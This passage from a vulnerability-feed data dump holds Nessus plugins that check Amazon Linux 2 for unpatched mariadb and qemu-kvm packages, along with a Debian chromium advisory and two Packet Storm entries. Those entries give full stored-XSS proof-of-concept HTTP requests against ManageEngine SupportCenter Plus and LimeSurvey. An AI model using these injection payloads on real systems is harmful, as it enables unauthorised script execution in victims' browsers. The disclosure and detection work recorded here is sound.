MySQL\n(subcomponent: Client mysqldump). Supported versions that are affected\nare 5.5.56 and earlier. Easily exploitable vulnerability allows low\nprivileged attacker with network access via multiple protocols to\ncompromise MySQL Server. Successful attacks of this vulnerability can\nresult in unauthorized update, insert or delete access to some of\nMySQL Server accessible data. CVSS 3.0 Base Score 4.3 (Integrity\nimpacts). CVSS Vector:\n(CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N).(CVE-2017-3651)\n\nVulnerability in the MySQL Server component of Oracle MySQL\n(subcomponent: Server: Replication). Supported versions that are\naffected are 5.5.59 and prior. Difficult to exploit vulnerability\nallows unauthenticated attacker with logon to the infrastructure where\nMySQL Server executes to compromise MySQL Server. Successful attacks\nrequire human interaction from a person other than the attacker and\nwhile the vulnerability is in MySQL Server, attacks may significantly\nimpact additional products. Successful attacks of this vulnerability\ncan result in takeover of MySQL Server. CVSS 3.0 Base Score 7.7\n(Confidentiality, Integrity and Availability impacts). CVSS Vector:\n(CVSS:3.0/AV:L/AC:H/PR:N/UI:R/S:C/C:H/I:H/A:H).(CVE-2018-2755)\n\nVulnerability in the MySQL Server component of Oracle MySQL\n(subcomponent: Server: Optimizer). Supported versions that are\naffected are 5.5.58 and prior. Easily exploitable vulnerability allows\nlow privileged attacker with network access via multiple protocols to\ncompromise MySQL Server. Successful attacks of this vulnerability can\nresult in unauthorized ability to cause a hang or frequently\nrepeatable crash (complete DOS) of MySQL Server. CVSS 3.0 Base Score\n6.5 (Availability impacts). CVSS Vector:\n(CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H).(CVE-2018-2640)\n\nVulnerability in the MySQL Server component of Oracle MySQL\n(subcomponent: Client programs). Supported versions that are affected\nare 5.5.57 and earlier. Easily exploitable vulnerability allows low\nprivileged attacker with network access via multiple protocols to\ncompromise MySQL Server. Successful attacks of this vulnerability can\nresult in unauthorized access to critical data or complete access to\nall MySQL Server accessible data. CVSS 3.0 Base Score 6.5\n(Confidentiality impacts). CVSS Vector:\n(CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N).(CVE-2017-10379 )\n\nVulnerability in the MySQL Server component of Oracle MySQL\n(subcomponent: Server: Replication). Supported versions that are\naffected are 5.5.57 and earlier. Difficult to exploit vulnerability\nallows high privileged attacker with logon to the infrastructure where\nMySQL Server executes to compromise MySQL Server. Successful attacks\nof this vulnerability can result in unauthorized access to critical\ndata or complete access to all MySQL Server accessible data. CVSS 3.0\nBase Score 4.1 (Confidentiality impacts). CVSS Vector:\n(CVSS:3.0/AV:L/AC:H/PR:H/UI:N/S:U/C:H/I:N/A:N).(CVE-2017-10268)\n\nVulnerability in the MySQL Server component of Oracle MySQL\n(subcomponent: Server: DDL). Supported versions that are affected are\n5.5.56 and earlier. Difficult to exploit vulnerability allows low\nprivileged attacker with network access via multiple protocols to\ncompromise MySQL Server. Successful attacks of this vulnerability can\nresult in unauthorized update, insert or delete access to some of\nMySQL Server accessible data. CVSS 3.0 Base Score 3.1 (Integrity\nimpacts). CVSS Vector:\n(CVSS:3.0/AV:N/AC:H/PR:L/UI:N/S:U/C:N/I:L/A:N).(CVE-2017-3653)\n\nVulnerability in the MySQL Server component of Oracle MySQL\n(subcomponent: Server: Locking). Supported versions that are affected\nare 5.5.59 and prior. Difficult to exploit vulnerability allows high\nprivileged attacker with network access via multiple protocols to\ncompromise MySQL Server. Successful attacks of this vulnerability can\nresult in unauthorized ability to cause a hang or frequently\nrepeatable crash (complete DOS) of MySQL Server. CVSS 3.0 Base Score\n4.4 (Availability impacts). CVSS Vector:\n(CVSS:3.0/AV:N/AC:H/PR:H/UI:N/S:U/C:N/I:N/A:H).(CVE-2018-2771)\n\nVulnerability in the MySQL Server component of Oracle MySQL\n(subcomponent: Server: Security: Encryption). Supported versions that\nare affected are 5.5.59 and prior. Difficult to exploit vulnerability\nallows low privileged attacker with network access via multiple\nprotocols to compromise MySQL Server. Successful attacks of this\nvulnerability can result in unauthorized read access to a subset of\nMySQL Server accessible data. CVSS 3.0 Base Score 3.1 (Confidentiality\nimpacts). CVSS Vector:\n(CVSS:3.0/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:N/A:N).(CVE-2018-2767)\n\nVulnerability in the MySQL Server component of Oracle MySQL\n(subcomponent: Server: DDL). Supported versions that are affected are\n5.5.59 and prior. Easily exploitable vulnerability allows low\nprivileged attacker with network access via multiple protocols to\ncompromise MySQL Server. Successful attacks of this vulnerability can\nresult in unauthorized ability to cause a hang or frequently\nrepeatable crash (complete DOS) of MySQL Server. CVSS 3.0 Base Score\n6.5 (Availability impacts). CVSS Vector:\n(CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H).(CVE-2018-2817)\n\nVulnerability in the MySQL Server component of Oracle MySQL\n(subcomponent: Server: Optimizer). Supported versions that are\naffected are 5.5.58 and prior, 5.6.38 and prior and 5.7.20 and prior.\nEasily exploitable vulnerability allows low privileged attacker with\nnetwork access via multiple protocols to compromise MySQL Server.\nSuccessful attacks of this vulnerability can result in unauthorized\nability to cause a hang or frequently repeatable crash (complete DOS)\nof MySQL Server. CVSS 3.0 Base Score 6.5 (Availability impacts). CVSS\nVector: (CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H).(CVE-2018-2668)\n\nVulnerability in the MySQL Server component of Oracle MySQL\n(subcomponent: Server: DDL). Supported versions that are affected are\n5.5.57 and earlier. Easily exploitable vulnerability allows low\nprivileged attacker with network access via multiple protocols to\ncompromise MySQL Server. Successful attacks of this vulnerability can\nresult in unauthorized ability to cause a hang or frequently\nrepeatable crash (complete DOS) of MySQL Server. CVSS 3.0 Base Score\n6.5 (Availability impacts). CVSS Vector:\n(CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H).(CVE-2017-10384)\n\nVulnerability in the MySQL Server component of Oracle MySQL\n(subcomponent: Server: DML). Supported versions that are affected are\n5.5.56 and earlier. Easily exploitable vulnerability allows high\nprivileged attacker with network access via multiple protocols to\ncompromise MySQL Server. Successful attacks of this vulnerability can\nresult in unauthorized ability to cause a hang or frequently\nrepeatable crash (complete DOS) of MySQL Server. CVSS 3.0 Base Score\n4.9 (Availability impacts). CVSS Vector:\n(CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H).(CVE-2017-3641)\n\nVulnerability in the MySQL Server component of Oracle MySQL\n(subcomponent: InnoDB). Supported versions that are affected are\n5.5.59 and prior. Easily exploitable vulnerability allows low\nprivileged attacker with network access via multiple protocols to\ncompromise MySQL Server. Successful attacks of this vulnerability can\nresult in unauthorized ability to cause a hang or frequently\nrepeatable crash (complete DOS) of MySQL Server. CVSS 3.0 Base Score\n6.5 (Availability impacts). CVSS Vector:\n(CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H).(CVE-2018-2819)\n\nVulnerability in the MySQL Server component of Oracle MySQL\n(subcomponent: Server: Optimizer). Supported versions that are\naffected are 5.5.58 and prior. Easily exploitable vulnerability allows\nlow privileged attacker with network access via multiple protocols to\ncompromise MySQL Server. Successful attacks of this vulnerability can\nresult in unauthorized ability to cause a hang or frequently\nrepeatable crash (complete DOS) of MySQL Server. CVSS 3.0 Base Score\n6.5 (Availability impacts). CVSS Vector:\n(CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H).(CVE-2018-2665)\n\nVulnerability in the MySQL Server component of Oracle MySQL\n(subcomponent: Server: DDL). Supported versions that are affected are\n5.5.58 and prior. Easily exploitable vulnerability allows low\nprivileged attacker with network access via multiple protocols to\ncompromise MySQL Server. Successful attacks of this vulnerability can\nresult in unauthorized ability to cause a hang or frequently\nrepeatable crash (complete DOS) of MySQL Server. CVSS 3.0 Base Score\n6.5 (Availability impacts). CVSS Vector:\n(CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H).(CVE-2018-2622)\n\nVulnerability in the MySQL Server component of Oracle MySQL\n(subcomponent: Server: DDL). Supported versions that are affected are\n5.5.59 and prior. Easily exploitable vulnerability allows low\nprivileged attacker with network access via multiple protocols to\ncompromise MySQL Server. Successful attacks of this vulnerability can\nresult in unauthorized read access to a subset of MySQL Server\naccessible data. CVSS 3.0 Base Score 4.3 (Confidentiality impacts).\nCVSS Vector:\n(CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N).(CVE-2018-2813)\n\nVulnerability in the MySQL Server component of Oracle MySQL\n(subcomponent: Client programs). Supported versions that are affected\nare 5.5.56 and earlier. Easily exploitable vulnerability allows low\nprivileged attacker with logon to the infrastructure where MySQL\nServer executes to compromise MySQL Server. Successful attacks of this\nvulnerability can result in unauthorized update, insert or delete\naccess to some of MySQL Server accessible data as well as unauthorized\nread access to a subset of MySQL Server accessible data and\nunauthorized ability to cause a partial denial of service (partial\nDOS) of MySQL Server. CVSS 3.0 Base Score 5.3 (Confidentiality,\nIntegrity and Availability impacts). CVSS Vector:\n(CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L).(CVE-2017-3636)\n\nVulnerability in the MySQL Server component of Oracle MySQL\n(subcomponent: Client programs). Supported versions that are affected\nare 5.5.59 and prior. Difficult to exploit vulnerability allows\nunauthenticated attacker with network access via multiple protocols to\ncompromise MySQL Server. Successful attacks of this vulnerability can\nresult in unauthorized ability to cause a hang or frequently\nrepeatable crash (complete DOS) of MySQL Server. CVSS 3.0 Base Score\n5.9 (Availability impacts). CVSS Vector:\n(CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H).(CVE-2018-2761)\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://alas.aws.amazon.com/AL2/ALAS-2018-1078.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Run 'yum update mariadb' to update your system.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:S/C:N/I:P/A:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:H/PR:N/UI:R/S:C/C:H/I:H/A:H\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:mariadb\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:mariadb-bench\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:mariadb-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:mariadb-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:mariadb-embedded\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:mariadb-embedded-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:mariadb-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:mariadb-server\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:mariadb-test\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:amazon:linux:2\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/09/15\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/09/19\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Amazon Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/AmazonLinux/release\", \"Host/AmazonLinux/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/AmazonLinux/release\");\nif (isnull(release) || !strlen(release)) audit(AUDIT_OS_NOT, \"Amazon Linux\");\nos_ver = pregmatch(pattern: \"^AL(A|\\d)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Amazon Linux\");\nos_ver = os_ver[1];\nif (os_ver != \"2\")\n{\n if (os_ver == 'A') os_ver = 'AMI';\n audit(AUDIT_OS_NOT, \"Amazon Linux 2\", \"Amazon Linux \" + os_ver);\n}\n\nif (!get_kb_item(\"Host/AmazonLinux/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (rpm_check(release:\"AL2\", reference:\"mariadb-5.5.60-1.amzn2\")) flag++;\nif (rpm_check(release:\"AL2\", reference:\"mariadb-bench-5.5.60-1.amzn2\")) flag++;\nif (rpm_check(release:\"AL2\", reference:\"mariadb-debuginfo-5.5.60-1.amzn2\")) flag++;\nif (rpm_check(release:\"AL2\", reference:\"mariadb-devel-5.5.60-1.amzn2\")) flag++;\nif (rpm_check(release:\"AL2\", reference:\"mariadb-embedded-5.5.60-1.amzn2\")) flag++;\nif (rpm_check(release:\"AL2\", reference:\"mariadb-embedded-devel-5.5.60-1.amzn2\")) flag++;\nif (rpm_check(release:\"AL2\", reference:\"mariadb-libs-5.5.60-1.amzn2\")) flag++;\nif (rpm_check(release:\"AL2\", reference:\"mariadb-server-5.5.60-1.amzn2\")) flag++;\nif (rpm_check(release:\"AL2\", reference:\"mariadb-test-5.5.60-1.amzn2\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"mariadb / mariadb-bench / mariadb-debuginfo / mariadb-devel / etc\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:SINGLE_INSTANCE/C:NONE/I:PARTIAL/A:COMPLETE/"}}, {"lastseen": "2018-09-20T00:22:36", "references": ["https://alas.aws.amazon.com/AL2/ALAS-2018-1073.html"], "pluginID": "117589", "description": "A heap buffer overflow issue was found in the way SLiRP networking back-end in QEMU processes fragmented packets. It could occur while reassembling the fragmented datagrams of an incoming packet. A privileged user/process inside guest could use this flaw to crash the QEMU process resulting in DoS or potentially leverage it to execute arbitrary code on the host with privileges of the QEMU process.(CVE-2018-11806)\n\nQuick Emulator (QEMU), compiled with the PC System Emulator with multiboot feature support, is vulnerable to an OOB r/w memory access issue. The issue could occur while loading a kernel image during the guest boot, if mh_load_end_addr address is greater than the mh_bss_end_addr address. A user or process could use this flaw to potentially achieve arbitrary code execution on a host.(CVE-2018-7550)", "edition": 1, "reporter": "Tenable", "published": "2018-09-19T00:00:00", "title": "Amazon Linux 2 : qemu-kvm (ALAS-2018-1073)", "type": "nessus", "enchantments": {"score": {"modified": "2018-09-20T00:22:36", "vector": "NONE", "value": 7.5}}, "naslFamily": "Amazon Linux Local Security Checks", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-11806", "CVE-2018-7550"], "modified": "2018-09-19T00:00:00", "cpe": ["p-cpe:/a:amazon:linux:qemu-kvm-tools", "p-cpe:/a:amazon:linux:qemu-kvm-common", "p-cpe:/a:amazon:linux:qemu-kvm-debuginfo", "cpe:/o:amazon:linux:2", "p-cpe:/a:amazon:linux:qemu-img", "p-cpe:/a:amazon:linux:qemu-kvm"], "id": "AL2_ALAS-2018-1073.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=117589", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Amazon Linux 2 Security Advisory ALAS-2018-1073.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(117589);\n script_version(\"1.1\");\n script_cvs_date(\"Date: 2018/09/19 10:04:09\");\n\n script_cve_id(\"CVE-2018-11806\", \"CVE-2018-7550\");\n script_xref(name:\"ALAS\", value:\"2018-1073\");\n\n script_name(english:\"Amazon Linux 2 : qemu-kvm (ALAS-2018-1073)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Amazon Linux 2 host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"A heap buffer overflow issue was found in the way SLiRP networking\nback-end in QEMU processes fragmented packets. It could occur while\nreassembling the fragmented datagrams of an incoming packet. A\nprivileged user/process inside guest could use this flaw to crash the\nQEMU process resulting in DoS or potentially leverage it to execute\narbitrary code on the host with privileges of the QEMU\nprocess.(CVE-2018-11806)\n\nQuick Emulator (QEMU), compiled with the PC System Emulator with\nmultiboot feature support, is vulnerable to an OOB r/w memory access\nissue. The issue could occur while loading a kernel image during the\nguest boot, if mh_load_end_addr address is greater than the\nmh_bss_end_addr address. A user or process could use this flaw to\npotentially achieve arbitrary code execution on a host.(CVE-2018-7550)\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://alas.aws.amazon.com/AL2/ALAS-2018-1073.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Run 'yum update qemu-kvm' to update your system.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:qemu-img\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:qemu-kvm\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:qemu-kvm-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:qemu-kvm-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:amazon:linux:qemu-kvm-tools\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:amazon:linux:2\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/09/15\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/09/19\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Amazon Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/AmazonLinux/release\", \"Host/AmazonLinux/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/AmazonLinux/release\");\nif (isnull(release) || !strlen(release)) audit(AUDIT_OS_NOT, \"Amazon Linux\");\nos_ver = pregmatch(pattern: \"^AL(A|\\d)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Amazon Linux\");\nos_ver = os_ver[1];\nif (os_ver != \"2\")\n{\n if (os_ver == 'A') os_ver = 'AMI';\n audit(AUDIT_OS_NOT, \"Amazon Linux 2\", \"Amazon Linux \" + os_ver);\n}\n\nif (!get_kb_item(\"Host/AmazonLinux/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (rpm_check(release:\"AL2\", reference:\"qemu-img-1.5.3-156.amzn2.5.4\")) flag++;\nif (rpm_check(release:\"AL2\", cpu:\"x86_64\", reference:\"qemu-kvm-1.5.3-156.amzn2.5.4\")) flag++;\nif (rpm_check(release:\"AL2\", cpu:\"x86_64\", reference:\"qemu-kvm-common-1.5.3-156.amzn2.5.4\")) flag++;\nif (rpm_check(release:\"AL2\", reference:\"qemu-kvm-debuginfo-1.5.3-156.amzn2.5.4\")) flag++;\nif (rpm_check(release:\"AL2\", cpu:\"x86_64\", reference:\"qemu-kvm-tools-1.5.3-156.amzn2.5.4\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"qemu-img / qemu-kvm / qemu-kvm-common / qemu-kvm-debuginfo / etc\");\n}\n", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "debian": [{"lastseen": "2018-09-20T01:57:31", "references": [], "affectedPackage": [{"OS": "Debian GNU/Linux", "OSVersion": "9", "packageVersion": "69.0.3497.92-1~deb9u1", "arch": "all", "packageFilename": "chromium-driver_69.0.3497.92-1~deb9u1_all.deb", "packageName": "chromium-driver", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "9", "packageVersion": "69.0.3497.92-1~deb9u1", "arch": "all", "packageFilename": "chromium-l10n_69.0.3497.92-1~deb9u1_all.deb", "packageName": "chromium-l10n", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "9", "packageVersion": "69.0.3497.92-1~deb9u1", "arch": "all", "packageFilename": "chromedriver_69.0.3497.92-1~deb9u1_all.deb", "packageName": "chromedriver", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "9", "packageVersion": "69.0.3497.92-1~deb9u1", "arch": "all", "packageFilename": "chromium_69.0.3497.92-1~deb9u1_all.deb", "packageName": "chromium", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "9", "packageVersion": "69.0.3497.92-1~deb9u1", "arch": "all", "packageFilename": "chromium-browser_69.0.3497.92-1~deb9u1_all.deb", "packageName": "chromium-browser", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "9", "packageVersion": "69.0.3497.92-1~deb9u1", "arch": "all", "packageFilename": "chromium-widevine_69.0.3497.92-1~deb9u1_all.deb", "packageName": "chromium-widevine", "operator": "lt"}, {"OS": "Debian GNU/Linux", "OSVersion": "9", "packageVersion": "69.0.3497.92-1~deb9u1", "arch": "all", "packageFilename": "chromium-shell_69.0.3497.92-1~deb9u1_all.deb", "packageName": "chromium-shell", "operator": "lt"}], "description": "Two vulnerabilities have been discovered in the chromium web browser. Kevin Cheung discovered an error in the WebAssembly implementation and evil1m0 discovered a URL spoofing issue.\n\nFor the stable distribution (stretch), this problem has been fixed in version 69.0.3497.92-1~deb9u1.\n\nWe recommend that you upgrade your chromium-browser packages.\n\nFor the detailed security status of chromium-browser please refer to its security tracker page at: <https://security-tracker.debian.org/tracker/chromium-browser>", "edition": 1, "reporter": "Debian", "published": "2018-09-19T00:00:00", "title": "chromium-browser -- security update", "type": "debian", "enchantments": {"score": {"modified": "2018-09-20T01:57:31", "vector": "NONE", "value": 5.0}}, "bulletinFamily": "unix", "cvelist": [], "modified": "2018-09-19T00:00:00", "id": "DSA-4297", "href": "http://www.debian.org/security/dsa-4297", "cvss": {"score": 0.0, "vector": "NONE"}}], "packetstorm": [{"lastseen": "2018-09-20T02:05:55", "references": [], "description": "", "edition": 1, "reporter": "Ismail Tasdelen", "published": "2018-09-19T00:00:00", "title": "ManageEngine SupportCenter Plus 8.1.0 Cross Site Scripting", "type": "packetstorm", "enchantments": {"score": {"modified": "2018-09-20T02:05:55", "vector": "NONE", "value": 4.3}}, "bulletinFamily": "exploit", "cvelist": ["CVE-2018-16965"], "modified": "2018-09-19T00:00:00", "id": "PACKETSTORM:149438", "href": "https://packetstormsecurity.com/files/149438/ManageEngine-SupportCenter-Plus-8.1.0-Cross-Site-Scripting.html", "sourceData": "`# Exploit Title: ManageEngine SupportCenter Plus 8.1.0 - HTML Injection and Stored XSS \n# Date: 2018-09-12 \n# Exploit Author: Ismail Tasdelen \n# Vendor Homepage: https://www.manageengine.com/ \n# Hardware Link : https://www.manageengine.com/products/support-center/ \n# Software : ZOHO Corp ManageEngine SupportCenter Plus \n# Product Version : 8.1.0 \n# Build Number : 8106 \n# Vulernability Type : Code Injection \n# Vulenrability : HTML Injection and Stored XSS \n# CVE : CVE-2018-16965 \n \nIn Zoho ManageEngine SupportCenter Plus 8.1.0, there is HTML Injection and Stored XSS via the /ServiceContractDef.do contractName parameter. \n \n# HTTP Request Header : \n \nPOST /ServiceContractDef.do HTTP/1.1 \nHost: demo.supportcenterplus.com \nUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0 \nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 \nAccept-Language: en-US,en;q=0.5 \nAccept-Encoding: gzip, deflate \nReferer: http://demo.supportcenterplus.com/ServiceContractDef.do \nCookie: JSESSIONID=A23F9A80AF7BA95A4D3D1ADA0753BB00; JSESSIONIDSSO=4A3C963EDC44F7D4E50067D34DCDC1E6; [object HTMLDivElement]=hide \nConnection: close \nUpgrade-Insecure-Requests: 1 \nContent-Type: application/x-www-form-urlencoded \nContent-Length: 604 \n \ncontractName=%22%3E%3Ch1%3EIsmail+Tasdelen%3C%2Fh1%3E%3Cimg+src%3Dx+onerror%3Dalert%28%27ismailtasdelen%27%29%3E&contractID=&contractInfoID=&contractMode=&createdBy=&services=&supportPlanRates=1%3D0.0&contractNumber=¤tDate=2018-09-12&fromDate=2018-09-12&toDate=2018-09-13&productList=&radio1=allProd&customerName=ismailtasdelen&description=&supportPlanID=1&supportPlanType=Hour+Based&rateTypeCost=0.0&totalCost=0.0&noofHours=0&noofMins=0&noofIncidents=0&servicename=&servicedesc=&attach=&attPath=&component=ServiceContract&attSize=&attachments=&selected=&beforeDays=00&beforeEnd=00&addContract=Save \n`\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://packetstormsecurity.com/files/download/149438/mescp810-xss.txt"}, {"lastseen": "2018-09-20T02:05:55", "references": [], "description": "", "edition": 1, "reporter": "Ismail Tasdelen", "published": "2018-09-19T00:00:00", "title": "LimeSurvey 3.14.7 Cross Site Scripting", "type": "packetstorm", "enchantments": {"score": {"modified": "2018-09-20T02:05:55", "vector": "NONE", "value": 4.3}}, "bulletinFamily": "exploit", "cvelist": ["CVE-2018-17003"], "modified": "2018-09-19T00:00:00", "id": "PACKETSTORM:149435", "href": "https://packetstormsecurity.com/files/149435/LimeSurvey-3.14.7-Cross-Site-Scripting.html", "sourceData": "`# Exploit Title: LimeSurvey 3.14.7 - HTML Injection and Stored XSS \n# Date: 2018-09-12 \n# Exploit Author: Ismail Tasdelen \n# Vendor Homepage: https://www.limesurvey.org/ \n# Software Link : https://github.com/LimeSurvey/LimeSurvey \n# Software : LimeSurvey 3.14.7 \n# Product Version: 3.14.7 \n# Vulernability Type : Command Injection \n# Vulenrability : HTML Injection and Stored XSS \n# CVE : CVE-2018-17003 \n \nIn LimeSurvey 3.14.7, HTML Injection and Stored XSS have been discovered in the appendix via the surveyls_title parameter to /index.php?r=admin/survey/sa/insert. \n \n# HTTP Request Header : \n \nPOST /index.php?r=admin/survey/sa/insert HTTP/1.1 \nHost: TARGET \nUser-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0 \nAccept: */* \nAccept-Language: en-US,en;q=0.5 \nAccept-Encoding: gzip, deflate \nReferer: https://TARGET/index.php?r=admin/survey/sa/newsurvey \nContent-Type: application/x-www-form-urlencoded; charset=UTF-8 \nX-Requested-With: XMLHttpRequest \nContent-Length: 1171 \nCookie: PHPSESSID=6o9og816dj2mjcupb6fvj09ob5; YII_CSRF_TOKEN=UVlQck12amlvN2g5QXIzS3kzTkl2cVNublRaQUNLZjhTGCmk4Kn1zO5gNBDuyHPEnql1b-Rg77VveQ4beA0TCg%3D%3D \nConnection: close \n \nYII_CSRF_TOKEN=UVlQck12amlvN2g5QXIzS3kzTkl2cVNublRaQUNLZjhTGCmk4Kn1zO5gNBDuyHPEnql1b-Rg77VveQ4beA0TCg%3D%3D&surveyls_title=%22%3E%3Ch1%3EIsmail+Tasdelen%3C%2Fh1%3E%3Cimg+src%3Dx+onerror%3Dalert(%22ismailtasdelen%22)%3E&language=en&createsample=0&description=&url=&urldescrip=&dateformat=3&numberformat_en=0&welcome=&endtext=&owner_id=1&admin=Administrator&adminemail=test%40domain.test&bounce_email=test%40domain.test&faxto=&gsid=23&format=G&template=fruity&navigationdelay=0&questionindex=0&showgroupinfo=B&showqnumcode=B&shownoanswer=N&showxquestions=0&showwelcome=0&showwelcome=1&allowprev=0&nokeyboard=0&showprogress=0&showprogress=1&printanswers=0&publicstatistics=0&publicgraphs=0&autoredirect=0&startdate=&expires=&listpublic=0&usecookie=0&usecaptcha_surveyaccess=0&usecaptcha_registration=0&usecaptcha_saveandload=0&datestamp=0&ipaddr=0&refurl=0&savetimings=0&assessments=0&allowsave=0&allowsave=1&emailnotificationto=&emailresponseto=&googleanalyticsapikeysetting=N&googleanalyticsstyle=0&tokenlength=15&anonymized=0&tokenanswerspersistence=0&alloweditaftercompletion=0&allowregister=0&htmlemail=0&htmlemail=1&sendconfirmation=0&sendconfirmation=1&saveandclose=1 \n`\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://packetstormsecurity.com/files/download/149435/limesurvey3147-xss.txt"}], "zdt": [{"lastseen": "2018-09-19T23:39:35", "references": [], "description": "Injection into a web application (Hack all servers have webapp open port 